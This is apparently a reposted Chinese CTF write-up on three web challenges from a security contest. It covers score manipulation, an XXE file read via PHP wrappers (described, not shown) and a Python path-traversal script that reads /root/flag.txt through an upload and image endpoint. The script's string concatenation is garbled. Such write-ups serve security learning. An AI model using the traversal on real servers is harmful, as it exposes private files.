首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

i春秋-网络与信息安全专项赛web部分wp

Game

这道题是最简单的,进入页面后发现没啥头绪,就打看源码,发现了js文件里有猫腻

这里就是score=15的时候就会利用ajax去访问score.php。这个地方有可能是个突破点。那咱们来试一下就知道了。于是我就访问score.php并且构造了post请求。没想到就能直接得到flag一枚。

who_are_you?

看到这个输入框一下就想到sql注入,我们来试一下,发现没啥用,就换个思路发现输入啥显示啥,可不可能是xss,我们试一下,发现并不是。但是我们发现了是xml请求。

xml自然就联想到了xxe攻击了,那就构造poc吧。

这里是利用了php中的伪协议读的index.php,然后我们得到的内容base64解码就可以拿到flag了。

show_me_your_image

一个上传图片的页面。

上传成功后,这个的cookie 就会返回一个 base64 编码的文件路径。

然后用 img.php?name= 传这个文件路径过去,可以读取这个文件。

import requests

import urllib

from base64 import *

path='../..///root/flag.txt'

files={'file': (path '...png','a')}

r=requests.post(url 'upload.php',files=files)

try:

name=r.text.split('img.php?name=')[1].split('"')[0]

except:

name=r.text

name=urllib.unquote(name)[:-8]

#print name

r=requests.get(url 'img.php?name=' urllib.quote(name))

print r.text

本人也菜,还有一到web题没有做出来。

/*本片参考已出的wp做的,如有侵权,告知本人立马删*/

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20190828A05YZA00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券